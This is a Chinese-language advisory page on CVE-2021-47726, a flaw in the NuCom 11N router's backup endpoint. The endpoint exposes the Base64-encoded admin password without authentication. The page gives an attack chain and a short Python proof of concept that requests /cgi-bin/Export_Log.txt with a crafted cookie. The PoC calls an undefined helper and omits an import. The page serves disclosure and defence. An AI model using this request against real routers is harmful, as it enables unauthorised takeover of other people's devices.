IPBUF安全漏洞报告
English
CVE-2021-47726 CVSS 7.5 高危

CVE-2021-47726 NuCom 11N路由器配置备份特权提升漏洞

披露日期: 2025-12-31

漏洞信息

漏洞编号
CVE-2021-47726
漏洞类型
特权提升
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
NuCom 11N Wireless Router

相关标签

特权提升NuCom路由器配置备份权限绕过

漏洞概述

NuCom 11N Wireless Router 5.07.90版本存在特权提升漏洞,允许非特权用户通过配置备份端点获取管理凭证。攻击者可通过构造特定的HTTP GET请求,利用特定cookie访问备份配置文件,从而获取Base64编码的管理员密码。此漏洞无需认证即可利用,可导致攻击者获得设备完全控制权。

技术细节

漏洞源于配置备份功能缺乏适当的访问控制。攻击者通过发送带有特定cookie的HTTP GET请求到备份配置页面(如/cgi-bin/Export_Log.txt),系统返回包含Base64编码管理员密码的配置文件。攻击者解码后即可获得明文管理员凭证,从而以管理员权限访问路由器管理界面。

攻击链分析

STEP 1
1
识别目标路由器
STEP 2
2
发送带cookie的GET请求到备份端点
STEP 3
3
获取Base64编码的配置文件
STEP 4
4
解码获得管理员密码
STEP 5
5
使用凭证登录管理界面

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # 目标路由器IP target_ip = '192.168.1.1' # 构造获取配置备份的请求 url = f'http://{target_ip}/cgi-bin/Export_Log.txt' headers = {'Cookie': 'admin=1'} # 发送请求获取配置 response = requests.get(url, headers=headers) # 提取并解码Base64密码 if response.status_code == 200: config = response.text # 提取密码字段并解码 password_b64 = extract_password(config) admin_password = base64.b64decode(password_b64) print(f'管理员密码: {admin_password}')

影响范围

5.07.90

防御指南

临时缓解措施
使用防火墙规则限制对管理接口的访问

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表